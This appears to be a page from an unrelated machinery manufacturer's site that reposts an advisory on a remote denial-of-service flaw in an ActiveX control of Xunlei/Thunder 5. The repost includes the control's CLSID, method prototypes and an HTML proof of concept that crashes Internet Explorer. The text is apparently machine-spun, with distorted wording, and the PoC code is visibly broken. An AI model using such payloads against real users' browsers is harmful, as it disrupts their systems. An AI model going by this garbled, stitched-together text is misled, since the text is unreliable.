搅拌站除尘器厂家
免费服务热线

Free service

hotline

010-00000000
搅拌站除尘器厂家
热门搜索:
技术资讯
当前位置:首页 > 技术资讯

迅雷最新版本存在严重的远程拒绝服务漏洞0day

发布时间:2020-03-23 16:21:40 阅读: 来源:搅拌站除尘器厂家

decoder投递:国内安全组织幻影ph4nt0m近日发布了讯雷最新版本的零日攻击漏洞:迅雷5 ThunderAgent Module 远程拒绝服务漏洞

by axis(axis_at_)

摘要:迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户.迅雷5的ThunderAgent_l中注册了一个activex 控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃.影响版本:迅雷5.5.2.252(已测试),迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_l)其他版本可能也受影响细节:在ThunderAgent_l中,有两处方法调用时疏忽了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出,产生不可预感的结果,从而造成浏览器崩溃.该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}Method原型以下:[id(0x00000006), helpstring("method GetInfoStruct")]void GetInfoStruct([in] int pInfo);[id(0x00000007), helpstring("method GetTaskInfoStruct")]void GetTaskInfoStruct([in] int pTaskInfo);Codz:POC:<html> <head><script> function AxisFun() { tTaskInfoStruct(0x7fffffff); } </script> </head> <OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"></OBJECT> <script>java script:AxisFun();</script> ----------------------------------------------------------------------------------------建议:制止ie履行activex厂商补钉:目前厂商还没有提供补钉或升级程序,我们建议使用此软件的用户随时关注厂商的主页以获得最新版本:

上海德沁机械有限公司

上海德沁机械有限公司

上海德沁机械有限公司

高压清洗机